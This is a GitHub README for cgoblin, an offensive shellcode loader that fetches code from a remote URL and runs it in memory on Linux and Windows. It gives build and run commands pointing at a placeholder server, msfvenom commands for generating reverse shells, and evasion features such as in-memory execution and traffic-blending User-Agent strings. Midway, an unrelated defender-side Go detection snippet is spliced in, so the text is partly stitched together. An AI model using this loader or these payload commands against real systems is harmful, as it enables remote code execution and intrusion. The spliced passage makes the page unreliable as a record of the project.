https://github.com/grisuno/cgoblin
cgoblin run shellcode from an url in windows and linux
- Host: GitHub
- URL: https://github.com/grisuno/cgoblin
- Owner: grisuno
- License: gpl-3.0
- Created: 2025-08-02T05:00:00.000Z (5 months ago)
- Default Branch: main
- Last Pushed: 2025-08-02T06:48:40.000Z (5 months ago)
- Last Synced: 2025-08-02T08:06:39.106Z (5 months ago)
- Topics: hacking, lazyown, linux, msfvenom-friendly, multiplatform, redteam, remote, shellcode, shellcode-loader, windows
- Language: Go
- Homepage: https://grisuno.github.io/LazyOwn/
- Size: 57.6 KB
- Stars: 0
- Watchers: 0
- Forks: 0
- Open Issues: 0
Metadata Files:
- Readme: README.md
- Contributing: CONTRIBUTING.md
- License: LICENSE
- Code of conduct: CODE_OF_CONDUCT.md
- Security: SECURITY.md
README
# CGOblin - Cross-Platform Shellcode Loader

**cgoblin** is a lightweight, cross-platform shellcode loader written in Go, capable of fetching and executing shellcode from a remote URL on both **Linux** and **Windows** systems. It leverages inline C via CGO to allocate executable memory and run position-independent machine code.
> *For educational and red teaming purposes only.*

---
## Repository
- **URL**: [https://github.com/grisuno/cgoblin.git](https://github.com/grisuno/cgoblin.git)
- **Author**: [grisuno](https://github.com/grisuno)
- **Team**: LazyOwn RedTeam
---
## Features
- Cross-platform support (Linux & Windows)
- Remote shellcode loading via HTTP(S)
- Shellcode parsing from `\xNN` hex format
- Memory allocation with execution permissions:
  - Uses `mmap()` on Linux
  - Uses `VirtualAlloc()` on Windows
- Minimal footprint and no disk staging (in memory only)
- Custom User-Agent and secure HTTP client settings
---

## Prerequisites
**CGOblin** requires a multi-language development environment supporting both Go and Python, with CGO compilation capabilities for system-level memory operations.
### Core Requirements
| Component | Version | Purpose |
|-----------|---------|---------|
| Go | 1.24.2+ | Core application runtime and compilation |
| Python | 3.x | Launcher script and development utilities [OPTIONAL] |
| CGO | Enabled | System call interface for memory operations |
| GCC/Clang | Latest | C compiler for CGO compilation |

## Usage

### Build

```bash
# Linux
GOOS=linux go build -o loader_linux main.go loader_linux.go
```
```bash
# Windows
GOOS=windows GOARCH=amd64 CGO_ENABLED=1 CC=x86_64-w64-mingw32-gcc go build -o loader_windows.exe
```

Ensure CGO is enabled: `CGO_ENABLED=1` (default when supported).

### Run

```bash
# Linux
# Example
./loader_linux -url http://your-server.com/shellcode.txt
```

```bash
# Windows
# Example
powershell .\loader_windows.exe -url http://your-server.com/shellcode.txt
```

```c
/* shellcode file format */
/* Example */
unsigned char buf[] = "\x6a\x29\x58\x99\x...";
```
Note: the loader parses only sequences matching `\x..` and ignores everything else.
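
Seen from the defender's side, the same `\x..` convention is what makes such a file recognisable in transit. The Go sketch below is an added example, not part of cgoblin: it flags an HTTP response body that is dominated by `\xNN` escapes. The function names, the two thresholds and both sample bodies are assumptions constructed for illustration.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// escRe matches one C-style hex escape such as \x41, the only token the
// README says the loader reads from a fetched file.
var escRe = regexp.MustCompile(`\\x[0-9a-fA-F]{2}`)

// Finding summarises how much of a response body is \xNN-escaped data.
type Finding struct {
	Escapes    int     // number of \xNN tokens found
	Ratio      float64 // share of body bytes covered by those tokens
	Suspicious bool    // both thresholds met
}

// InspectBody flags bodies dominated by \xNN tokens. minEscapes and minRatio
// are tuning assumptions for this example, not values from the project.
func InspectBody(body []byte, minEscapes int, minRatio float64) Finding {
	n := len(escRe.FindAll(body, -1))
	f := Finding{Escapes: n}
	if len(body) > 0 {
		f.Ratio = float64(n*4) / float64(len(body)) // each token is 4 bytes
	}
	f.Suspicious = n >= minEscapes && f.Ratio >= minRatio
	return f
}

// EncodedSample is constructed: 64 filler bytes (0x41) in the C-array layout.
func EncodedSample() []byte {
	return []byte(`unsigned char buf[] = "` + strings.Repeat(`\x41`, 64) + `";`)
}

// BenignSample is constructed: ordinary script text with two stray escapes.
func BenignSample() []byte {
	return []byte(`var greeting = "hello\x20world\x21"; console.log(greeting);`)
}

func main() {
	for name, body := range map[string][]byte{
		"encoded": EncodedSample(), "benign": BenignSample(),
	} {
		f := InspectBody(body, 16, 0.5)
		fmt.Printf("%-8s escapes=%d ratio=%.2f suspicious=%v\n", name, f.Escapes, f.Ratio, f.Suspicious)
	}
}
```

Requiring both a minimum token count and a minimum ratio keeps ordinary scripts with a few escapes from alerting; tune the thresholds against your own proxy or IDS traffic.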

```bash
# shellcode
# Example Linux
msfvenom -p linux/x64/shell_reverse_tcp LHOST={lhost} LPORT={lport} -f c -o shellcode_test.txt
```
```bash
# shellcode
# Example Windows
msfvenom -p windows/x64/shell_reverse_tcp LHOST={lhost} LPORT={lport} -f c -o shellcode_test.txt
```
```text
# Tree
# Example
.
├── go.mod              # Go module definition
├── main.go             # Entry point with CLI flag parsing
├── loader_linux.go     # Linux-specific execution logic (CGO + mmap)
├── loader_windows.go   # Windows-specific execution logic (CGO + VirtualAlloc)
├── shellcode_linux.txt # Example Linux shellcode (bind/reverse shell)
└── shellcode_win.txt   # Example Windows shellcode (e.g., Calc or Cmd)
```
Example shellcode files are provided for testing (non-malicious use recommended).

## Testing Safely
To test without risk:
- Host a simple shellcode (e.g., `execve("/bin/sh")` on Linux or `WinExec("calc.exe")` on Windows).
- Use a local HTTP server:
```bash
# Webserver
# Example
python3 -m http.server 8000
```
## Security and Operational Considerations
cgoblin implements several security-conscious design patterns:
- Memory-only operations: No temporary files are created during shellcode processing
- Custom HTTP headers: Configurable User-Agent strings to blend with legitimate traffic
- Input validation: Shellcode size limits and format verification
- Platform isolation: Platform-specific code paths prevent cross-contamination
- CGO safety: Proper memory management in C interface layers
## External Framework Integration
### Purpose and Scope
This document covers how **CGOblin** integrates with external exploitation frameworks and automation systems. The integration system allows external tools to automatically configure, build, and execute the shellcode loader with dynamically generated payloads. This capability enables **CGOblin** to function as a component within larger penetration testing suites and automated exploitation frameworks.
For information about the core shellcode loading functionality, see Core Shellcode Loader System. For details about the build system that supports framework integration, see Build System.
### Framework Integration Architecture
The external framework integration system uses a YAML-based configuration approach that defines how external tools can interact with **CGOblin**. The integration supports parameter-driven payload generation and automated execution workflows.
## Disclaimer
This tool is intended for:
- Security research
- Red team operations
- Authorized penetration testing

Do not use for unauthorized access or malicious purposes. The author and team assume no liability for misuse.
## Compliance Framework
Users of cgoblin must ensure compliance with:
- Local Computer Crime Laws: Unauthorized access laws vary by jurisdiction
- Professional Ethics: Penetration testing codes of conduct
- Contractual Obligations: Scope limitations in security assessments
- Data Protection Regulations: Privacy laws when handling target systems
## Team: LazyOwn RedTeam
A dedicated red team focused on offensive security, exploit development, and defensive evasion techniques.
"We break it to make it better - ethically."
## License
This project is open-source for educational use. See LICENSE for details (**GPLv3**).
# Links
- [+] **gomulti_loader** the little brother of **CGOblin**: [https://github.com/grisuno/gomulti_loader](https://github.com/grisuno/gomulti_loader)
- [+] Shorts: [https://www.youtube.com/shorts/kPZvVV_RNIE](https://www.youtube.com/shorts/kPZvVV_RNIE)
- [+] Deepwiki: [https://deepwiki.com/grisuno/cgoblin](https://deepwiki.com/grisuno/cgoblin)
- [+] Github: [https://github.com/grisuno/LazyOwn](https://github.com/grisuno/LazyOwn)
- [+] Web: [https://grisuno.github.io/LazyOwn/](https://grisuno.github.io/LazyOwn/)
- [+] Reddit: [https://www.reddit.com/r/LazyOwn/](https://www.reddit.com/r/LazyOwn/)
- [+] Facebook: [https://web.facebook.com/profile.php?id=61560596232150](https://web.facebook.com/profile.php?id=61560596232150)
- [+] HackTheBox: [https://app.hackthebox.com/teams/overview/6429](https://app.hackthebox.com/teams/overview/6429)
- [+] Grisun0: [https://app.hackthebox.com/users/1998024](https://app.hackthebox.com/users/1998024)
- [+] Patreon: [https://patreon.com/LazyOwn](https://patreon.com/LazyOwn)
- [+] Download: [https://github.com/grisuno/LazyOwn/archive/refs/tags/release/0.2.47.tar.gz](https://github.com/grisuno/LazyOwn/archive/refs/tags/release/0.2.47.tar.gz)